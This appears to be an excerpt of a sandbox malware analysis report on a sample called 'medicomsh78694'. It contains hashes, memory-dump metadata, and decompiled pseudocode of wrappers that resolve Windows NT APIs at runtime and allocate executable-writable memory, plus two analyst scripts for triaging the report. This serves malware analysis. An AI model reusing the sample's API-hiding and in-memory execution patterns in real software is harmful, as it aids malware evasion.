Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
Similarity
• API ID:
• String ID: DAD$DAD$WY>$WY>
• API String ID: 0-682574126
• Opcode ID: 35521070ef865b96a2b0d191d71f39367691bc40cbe403d5fde56add1ac35e62
• Instruction ID: 5bc91635fc10a019c4c1226c26d853eb034b0aca4ac157a03dd93d6f9ca69c2e
• Opcode Fuzzy Hash: 35521070ef865b96a2b0d191d71f39367691bc40cbe403d5fde56add1ac35e62
• Instruction Fuzzy Hash: 8D6129B0D04609DFDF04CFA5C5816EEFBF2AF84300F14846AD525AB655D7389A82CF99
Uniqueness
Uniqueness Score: -1.00%

                                                                            • Opcode Fuzzy Hash: 0e8fd8709ea9cf254de76471bc76cb213616a63e055dae04b53c0a14775583a5
                                                                            • Instruction Fuzzy Hash: 00213370E112189BDB48CFAAD940A9EFBF7EFC9300F14C03AE408A7254DB345A42DB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8cc03186f906eabac22f7d213d5c3ad70075af3bf388e303dfe080ae1cd6f37d
                                                                            • Instruction ID: 9603e1cd4215542aca5c45d41f86c4b81649ccf914f83cf27cd247c039b95e33
                                                                            • Opcode Fuzzy Hash: 8cc03186f906eabac22f7d213d5c3ad70075af3bf388e303dfe080ae1cd6f37d
                                                                            • Instruction Fuzzy Hash: D921EA71E086489BEB18CF6B8C406DEFBF3AFC9200F18C1BAC548A6265DB7405568F11
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dca0d0392701ad148758f54b724fd4bfefc8676d5a346f9209388955ed1a732b
                                                                            • Instruction ID: aa64bbd732aaaa4bea6dabcbf8d2749acbe14e8b59fa02a098350f1a9ec0c4e3
                                                                            • Opcode Fuzzy Hash: dca0d0392701ad148758f54b724fd4bfefc8676d5a346f9209388955ed1a732b
                                                                            • Instruction Fuzzy Hash: F0113030D042598FEB14CFA5C848BEEBBF1AB4D301F24507AD441B3390CB785988DB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8A$\-2l$\-2l$\-2l$\-2l$\-2l
                                                                            • API String ID: 0-2549659905
                                                                            • Opcode ID: ae4a8778a4b22710dc7e02e28bd72fe07561855bb2adcb41a9d01744aab98a63
                                                                            • Instruction ID: 14f52be3bf080f7880cded58a8a3d6e72109a1aa3d5f65515ff504c304dc949c
                                                                            • Opcode Fuzzy Hash: ae4a8778a4b22710dc7e02e28bd72fe07561855bb2adcb41a9d01744aab98a63
                                                                            • Instruction Fuzzy Hash: E0B1F230A08245DFCB268FA8D851BEDBBF6BF45304F248476E519AB691C7388C41DB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                             Execution Coverage: 3.6%
                                                                             Dynamic/Decrypted Code Coverage: 3.6%
                                                                             Signature Coverage: 6.2%
                                                                             Total number of Nodes: 612
                                                                             Total number of Limit Nodes: 76

                                                                            Graph

                                                                             The rendered execution graph is not reproduced here. The node/edge export behind it (node id, code address, optional API label; edges written id->id) carries the following information:
                                                                             • Entry node 41089 at 41d450, leading through 419c00, 408b70, 40d180 and 40a620. Two further components have no incoming edge from the entry: one starting at 40aa95 (reaching 4182f0, 418720 and the NtClose site 41873c), and one starting at c6e751 (c6e751 -> c6e76e -> bbe0c6 LdrInitializeThunk/__raise_exc -> c6e79e -> baf900 LdrInitializeThunk -> c6e7a4 -> bbe025 LdrInitializeThunk -> c6e8aa). baf9f0 LdrInitializeThunk is an isolated node.
                                                                             • NT and Rtl call sites are small wrappers that lead through 4191f0 (LdrLoadDll) into the call node, i.e. the function is resolved at call time rather than through an import table: 4185f0 -> 41860c NtCreateFile, 4186a0 -> 4186bc NtReadFile, 418720 -> 41873c NtClose, 4187d0 -> 4187ec NtAllocateVirtualMemory, 4188c0 -> 4188dc RtlAllocateHeap, 418900 -> 41891c RtlFreeHeap, 418a60 -> 418a7f LookupPrivilegeValueW, 418940 -> 41895f ExitProcess. PostThreadMessageW at 4072dc is reached from 407290 through LdrLoadDll nodes at 409b50 and 413e60.
                                                                             • Other wrappers in the same range (4180b0, 418120, 418150, 418190, 418210, 418250, 4182a0, 4182f0, 4184b0, 4184f0, 418790, 418810, 418850) also pass through 4191f0 and end in nodes between baf900 and bb07ac labelled LdrInitializeThunk (bafae8, bafb68, bafbb8, bafc60, bafc90, bafd8c, bafdc0, bafea0, bafed0, baffb4, bb0048, bb0078, bb07ac).
                                                                             • 419000 calls 418ec0 (LdrLoadDll) some forty times in sequence (return sites 41901d through 41917c), a bulk import-resolution routine; 418ec0 itself goes through 413e60 (LdrLoadDll).
                                                                             • Further LdrLoadDll nodes: 405ea0, 409bb0, 409ea0, 4142e0, 417f20, 417f60, 418020, 418050, 4180e0, 418530, 4185b0, 4186f0, 418aa0, 419190, 419830, 41a2c0 (with RtlAllocateHeap), 41b2c0 (with RtlFreeHeap), 41b300 (with RtlAllocateHeap and RtlFreeHeap), 40d360 (with NtClose), 4137a0 (with NtReadFile and NtClose), 413660 and 40a920 (with NtClose and LdrInitializeThunk).
                                                                             • Subtrees collapsed to a call count: 407720 (19 API calls), 407320 (11), 40d480 (10), 413a60 (8), 406e30 (4), 413070, 40d210 and 41b390 (3 each), and the 2-call wrappers 4070f0, 418940, 418720, 41a0b0, 41a030, 41a280, 41b260, 418150, 418190, 4182a0, 4182f0, 4180b0, 418790 and 418850.
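The report carries the execution graph as a flat token stream (node id, code address, optional API label, and id->id edges) that is hard to read by eye. The script below is an added example written for this page, not part of the Joe Sandbox report or its tooling. It parses that stream and answers the questions an analyst actually has: which APIs are reachable from the entry node, by which path, and whether each NT/Rtl call node is fed by the 4191f0 LdrLoadDll stub, meaning the function is resolved at call time rather than through an import table. The embedded sample is a constructed, verbatim subset of this report's graph; the rule that node ids have at least five decimal digits and the choice of 4191f0 as the resolver stub are assumptions taken from this report.

```python
"""Parse the flat execution_graph export of a Joe Sandbox report.

Token format as it appears in the report: a node is `<id> <hexaddr>` followed by
optional labels (an API name, or a collapsed subtree written `N API calls`); an
edge is `<id>-><id>`. Assumption: node ids have at least five decimal digits
(true here, ids start at 41089), which keeps them apart from the N in `N API calls`.
"""
import re
from collections import defaultdict, deque

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d{5,}$")
ADDR_RE = re.compile(r"^[0-9a-f]{1,8}$")
NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
RESOLVER_ADDR = "4191f0"  # assumption: the stub that calls LdrLoadDll ahead of each NT API here

# Constructed sample: a verbatim subset of this report's graph (the full path from
# the entry node to ExitProcess, plus the NtCreateFile wrapper on its own).
SAMPLE = """
execution_graph 41089 41d450 41090 41d45b 41089->41090 41092 419c00 41089->41092
41093 419c26 41092->41093 41104 408b70 41093->41104 41095 419c32 41103 419c79
41095->41103 41112 40d180 41095->41112 41097 419c47 41100 419c5c 41097->41100
41160 418940 41097->41160 41101 419c6b 41102 418940 2 API calls 41101->41102
41102->41103 41103->41090 41105 408b7d 41104->41105 41107 408b84 41105->41107
41107->41095 41113 40d1ac 41112->41113 41595 40a020 41113->41595 41115 40d1be
41599 40d090 41115->41599 41119 40d1d9 41120 40d1e4 41119->41120 41120->41097
41596 40a047 41595->41596 41597 409ea0 LdrLoadDll 41596->41597 41598 40a076
41597->41598 41598->41115 41608 40d160 41599->41608 41608->41119
41161 4191f0 LdrLoadDll 41160->41161 41162 41895f ExitProcess 41161->41162 41162->41100
41300 4185f0 41236->41300 41301 41860c NtCreateFile 41300->41301
41302 4191f0 LdrLoadDll 41300->41302 41301->41240 41302->41301
"""

def parse_graph(text):
    """Return ({id: {'addr', 'labels'}}, {id: [successor ids]})."""
    tokens = text.split()
    nodes, edges, current, i = {}, defaultdict(list), None, 0
    while i < len(tokens):
        tok, m = tokens[i], EDGE_RE.match(tokens[i])
        if m:
            edges[m.group(1)].append(m.group(2))
            current, i = None, i + 1
        elif NODE_ID_RE.match(tok) and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            nodes[tok] = {"addr": tokens[i + 1], "labels": []}
            current, i = tok, i + 2
        else:
            if current is not None:  # trailing label of the node just read
                nodes[current]["labels"].append(tok)
            i += 1
    return nodes, dict(edges)

def api_names(node):
    """API labels on a node; a collapsed `N API calls` subtree names no API."""
    lab = node["labels"]
    if len(lab) >= 3 and lab[0].isdigit() and lab[1:3] == ["API", "calls"]:
        return []
    return [l for l in lab if NAME_RE.match(l)]

def bfs(edges, start):
    """Breadth-first walk from `start`; yields (node, parent-map) in visiting order."""
    parent, queue = {start: None}, deque([start])
    while queue:
        n = queue.popleft()
        yield n, parent
        for m in edges.get(n, []):
            if m not in parent:
                parent[m] = n
                queue.append(m)

def apis_from(nodes, edges, start):
    """Sorted API names on nodes reachable from `start`."""
    return sorted({a for n, _ in bfs(edges, start) if n in nodes for a in api_names(nodes[n])})

def path_to_api(nodes, edges, start, api):
    """Shortest path (as code addresses) from `start` to the nearest node labelled `api`."""
    for n, parent in bfs(edges, start):
        if n in nodes and api in api_names(nodes[n]):
            path = []
            while n is not None:
                path.append(nodes[n]["addr"] if n in nodes else n)
                n = parent[n]
            return path[::-1]
    return None

def resolver_gated(nodes, edges, resolver_addr=RESOLVER_ADDR):
    """{(addr, api): True if some predecessor of that call node is the resolver stub}."""
    preds = defaultdict(set)
    for src, dsts in edges.items():
        for d in dsts:
            preds[d].add(src)
    out = {}
    for nid, nd in nodes.items():
        for api in api_names(nd):
            gated = any(nodes.get(p, {}).get("addr") == resolver_addr for p in preds[nid])
            out[(nd["addr"], api)] = out.get((nd["addr"], api), False) or gated
    return out

if __name__ == "__main__":
    nodes, edges = parse_graph(SAMPLE)
    print(apis_from(nodes, edges, "41089"))
    print(" -> ".join(path_to_api(nodes, edges, "41089", "ExitProcess")))
    for key, gated in sorted(resolver_gated(nodes, edges).items()):
        print(key, "resolver-gated" if gated else "direct")
```

Run against the full export, the same three calls list every API the entry path can reach, give the address chain to any one of them, and separate call nodes that sit behind the 4191f0 stub (NtCreateFile, NtReadFile, NtClose, ExitProcess and the others in the 418xxx range) from plain LdrLoadDll nodes such as 409ea0, which are themselves the loader calls. Collapsed "N API calls" subtrees are deliberately reported as nameless, since the export does not say which APIs they contain.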

                                                                            Executed Functions

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 418642-41864c 1 418615-418641 NtCreateFile 0->1 2 41864e-418699 call 4191f0 0->2
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID: *9A
                                                                            • API String ID: 823142352-3318015640
                                                                            • Opcode ID: a902431928215715c73cc22ddcd2ca37c7a5c3bf83ed93c80a9a52187be31b74
                                                                            • Instruction ID: 7cd4801693cb99a4425d6adea110bb0ada610b278f95903872666adc5ed39432
                                                                            • Opcode Fuzzy Hash: a902431928215715c73cc22ddcd2ca37c7a5c3bf83ed93c80a9a52187be31b74
                                                                            • Instruction Fuzzy Hash: 5811CDB2204209AFCB18DF99DC94DEB7BADAF8C314F15864DBA5D93241D630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%
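The Memory Dump Source lines above and earlier on this page say which process and which memory region each disassembled function was taken from: two regions in process index 4 (00370000 and 00440000) are dumps with no PE header, while the region in process index 5 at 00400000 is PE-backed. The script below is an added example written for this page, not part of the Joe Sandbox report or its tooling; it parses those lines and separates executable-and-writable regions without a PE header (code written into memory and then run) from executable-and-writable regions that are PE-backed (an image whose pages are writable, as after hollowing or manual mapping). The dump-file field layout `<procindex>.<round>.<timestamp>.<base>.<protect>.<type>.sdmp` and the reading of `protect` as a Windows PAGE_* value (0x40 is PAGE_EXECUTE_READWRITE) are assumptions about the sandbox's naming convention; the sample lines are copied from this report.

```python
"""Triage the `Memory Dump Source` lines of a Joe Sandbox report.

Assumed dump-file naming (stated as an assumption about the sandbox convention):
    <procindex>.<round>.<timestamp>.<base>.<protect>.<type>.sdmp
`protect` is read as the Windows PAGE_* protection of the region
(0x40 = PAGE_EXECUTE_READWRITE); `type` is a sandbox-internal code and is kept raw.
"""
import re

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80

LINE_RE = re.compile(
    r"Source File:\s*(?P<proc>[0-9A-Fa-f]{8})\.(?P<round>[0-9A-Fa-f]{8})\.(?P<ts>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\.sdmp"
    r".*?based on PE:\s*(?P<pe>true|false)", re.IGNORECASE)

# Constructed sample: the three distinct dump-source lines of this report (one of
# them repeated, as the report repeats it) plus a non-dump line that must be ignored.
SAMPLE_LINES = [
    "• Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false",
    "• Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false",
    "• Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false",
    "• Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true",
    "• Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd",
]

def parse_dump_line(line):
    """One report line -> region record, or None if it is not a dump-source line."""
    m = LINE_RE.search(line)
    if not m:
        return None
    prot = int(m["prot"], 16)
    return {
        "proc": int(m["proc"], 16), "round": int(m["round"], 16),
        "base": int(m["base"], 16), "prot": prot,
        "prot_name": PAGE_PROTECT.get(prot & 0xFF, hex(prot)),
        "pe_backed": m["pe"].lower() == "true",
    }

def classify(d):
    """Verdict for one region from its protection and whether it has a PE header."""
    exe, wr = bool(d["prot"] & EXEC_MASK), bool(d["prot"] & WRITE_MASK)
    if exe and wr and not d["pe_backed"]:
        return "rwx-no-pe-header"  # code written into memory and then executed
    if exe and wr:
        return "rwx-pe-image"      # image with writable pages: hollowed or manually mapped
    if exe and not d["pe_backed"]:
        return "exec-no-pe-header"
    return "normal"

def triage(lines):
    """Unique (process, base) regions with a verdict, ordered by process then base."""
    seen = {}
    for line in lines:
        d = parse_dump_line(line)
        if d:
            seen[(d["proc"], d["base"])] = dict(d, verdict=classify(d))
    return [seen[k] for k in sorted(seen)]

def suspicious(lines):
    """Regions worth pulling for static analysis: everything that is not 'normal'."""
    return [r for r in triage(lines) if r["verdict"] != "normal"]

if __name__ == "__main__":
    for r in triage(SAMPLE_LINES):
        print(f"proc {r['proc']} base {r['base']:#010x} {r['prot_name']:<24} "
              f"pe_backed={str(r['pe_backed']):<5} -> {r['verdict']}")
```

Feeding the whole report through `triage` gives one row per dumped region instead of one per disassembled function, which is the list you want when deciding which .sdmp files to carve, scan or load into a disassembler first.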

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
• Node 7: 41869a-4186e9 (call 4191f0; NtReadFile)
                                                                            C-Code - Quality: 21%
                                                                            			E0041869A(signed int* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32) {
                                                                            				intOrPtr _v0;
                                                                            				intOrPtr _v4;
                                                                            				void* _t18;
                                                                            				void* _t28;
                                                                            				void* _t29;
                                                                            				intOrPtr* _t30;
                                                                            				void* _t32;
                                                                            
                                                                            				 *__ebx =  !( *__ebx);
                                                                            				asm("cmpsb");
                                                                            				_t13 = _v4;
                                                                            				_t30 = _v4 + 0xc48;
                                                                            				E004191F0(_t28, _v4, _t30,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                            				_t4 =  &_a32; // 0x413a41
                                                                            				_t18 =  *((intOrPtr*)( *_t30))(_v0, _a4, _a8, _a12, _a16, _a20, _a24, _a28,  *_t4, _t29, _t32, 0xec8b5520); // executed
                                                                            				return _t18;
                                                                            			}

Instruction addresses: 0x0041869b, 0x0041869d, 0x004186a3, 0x004186af, 0x004186b7, 0x004186bc, 0x004186e5, 0x004186e9

                                                                            APIs
                                                                            • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID: A:A
                                                                            • API String ID: 2738559852-2859176346
                                                                            • Opcode ID: ae3c4f7991056f379bf24a6280c134c6b9f6e3a9711b9fcbe6756b7d9981eb8b
                                                                            • Instruction ID: 13298110a0846653f0ac1476c6a677bbddcf6e397e7a2774f66647860b2f683d
                                                                            • Opcode Fuzzy Hash: ae3c4f7991056f379bf24a6280c134c6b9f6e3a9711b9fcbe6756b7d9981eb8b
                                                                            • Instruction Fuzzy Hash: 30F092B6200108AFDB14DF89DD94EEB77AABF8C354F158249BA1DA7251D630E851CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
• Node 10: 4186a0-4186b6
• Node 11: 4186bc-4186e9 (NtReadFile)
• Node 12: 4186b7 (call 4191f0)
• Edges: 10->11, 10->12, 12->11
                                                                            C-Code - Quality: 37%
                                                                            			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
                                                                            				void* _t18;
                                                                            				void* _t27;
                                                                            				intOrPtr* _t28;
                                                                            
                                                                            				_t13 = _a4;
                                                                            				_t28 = _a4 + 0xc48;
                                                                            				E004191F0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                            				_t4 =  &_a40; // 0x413a41
                                                                            				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
                                                                            				return _t18;
                                                                            			}

Instruction addresses: 0x004186a3, 0x004186af, 0x004186b7, 0x004186bc, 0x004186e5, 0x004186e9

                                                                            APIs
                                                                            • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID: A:A
                                                                            • API String ID: 2738559852-2859176346
                                                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                            • Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
                                                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                            • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
• Node 280: 409b50-409b6c
• Node 281: 409b74-409b79
• Node 282: 409b6f (call 41af80)
• Node 283: 409b7b-409b7e
• Node 284: 409b7f-409b8d (call 41b3a0)
• Node 287: 409b9d-409bae (call 419730)
• Node 288: 409b8f-409b9a (call 41b620)
• Node 293: 409bb0-409bc4 (LdrLoadDll)
• Node 294: 409bc7-409bca
• Edges: 280->281, 280->282, 281->283, 281->284, 282->281, 284->287, 284->288, 287->293, 287->294, 288->287, 293->294
                                                                            C-Code - Quality: 100%
                                                                            			E00409B50(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                            				char* _v8;
                                                                            				struct _EXCEPTION_RECORD _v12;
                                                                            				struct _OBJDIR_INFORMATION _v16;
                                                                            				char _v536;
                                                                            				void* _t15;
                                                                            				struct _OBJDIR_INFORMATION _t17;
                                                                            				struct _OBJDIR_INFORMATION _t18;
                                                                            				void* _t30;
                                                                            				void* _t31;
                                                                            				void* _t32;
                                                                            
                                                                            				_v8 =  &_v536;
                                                                            				_t15 = E0041AF80( &_v12, 0x104, _a8);
                                                                            				_t31 = _t30 + 0xc;
                                                                            				if(_t15 != 0) {
                                                                            					_t17 = E0041B3A0(__eflags, _v8);
                                                                            					_t32 = _t31 + 4;
                                                                            					__eflags = _t17;
                                                                            					if(_t17 != 0) {
                                                                            						E0041B620( &_v12, 0);
                                                                            						_t32 = _t32 + 8;
                                                                            					}
                                                                            					_t18 = E00419730(_v8);
                                                                            					_v16 = _t18;
                                                                            					__eflags = _t18;
                                                                            					if(_t18 == 0) {
                                                                            						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                            						return _v16;
                                                                            					}
                                                                            					return _t18;
                                                                            				} else {
                                                                            					return _t15;
                                                                            				}
                                                                            			}

Instruction addresses: 0x00409b6c, 0x00409b6f, 0x00409b74, 0x00409b79, 0x00409b83, 0x00409b88, 0x00409b8b, 0x00409b8d, 0x00409b95, 0x00409b9a, 0x00409b9a, 0x00409ba1, 0x00409ba9, 0x00409bac, 0x00409bae, 0x00409bc2, 0x00000000, 0x00409bc4, 0x00409bca, 0x00409b7e, 0x00409b7e, 0x00409b7e

                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                            • Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
                                                                            • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                            • Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
• Node 295: 4185ea-4185ed
• Node 296: 418622-418641 (NtCreateFile)
• Node 297: 4185ef-418621 (call 4191f0)
• Edges: 295->296, 295->297, 297->296
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 13406f17d3e1d205a5ec7466ae84575eb744e91f4cc922cf2fb3f671efbf0cf9
                                                                            • Instruction ID: 48c0b808d72aef0fc00c8bbe7dd7d51c6ea24f2334b6f99c7190edb1e7afade8
                                                                            • Opcode Fuzzy Hash: 13406f17d3e1d205a5ec7466ae84575eb744e91f4cc922cf2fb3f671efbf0cf9
                                                                            • Instruction Fuzzy Hash: DE01D6B6215108BBDB08CF98DC95DDB77A9EF8C744F018248FA0D97281C634E951CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
• Node 301: 4185f0-418606
• Node 302: 41860c-418641 (NtCreateFile)
• Node 303: 418607 (call 4191f0)
• Edges: 301->302, 301->303, 303->302
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                            • Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
                                                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                            • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
• Node 306: 4187ca-41880d (call 4191f0; NtAllocateVirtualMemory)
                                                                            C-Code - Quality: 64%
                                                                            			E004187CA(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                            				long _t16;
                                                                            				void* _t23;
                                                                            
                                                                            				asm("lodsb");
                                                                            				asm("rol esp, 0xec");
                                                                            				_t12 = _a4;
                                                                            				_t3 = _t12 + 0xc60; // 0xca0
                                                                            				E004191F0(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                            				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                            				return _t16;
                                                                            			}

Instruction addresses: 0x004187ca, 0x004187cb, 0x004187d3, 0x004187df, 0x004187e7, 0x00418809, 0x0041880d

                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: bb82000e734e4a10ac5c614d03afeabe546e7b090f5e83a0c1c691b7d339b353
                                                                            • Instruction ID: a7e419cf381e6249e5190e58f0e2e2dc9be517df532fda4a197b6c04a362d784
                                                                            • Opcode Fuzzy Hash: bb82000e734e4a10ac5c614d03afeabe546e7b090f5e83a0c1c691b7d339b353
                                                                            • Instruction Fuzzy Hash: F3F01CB5210109ABDB14DF89DC81EE777ADBF88354F118649FE5997281C630E920CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
• Node 309: 4187d0-4187e6
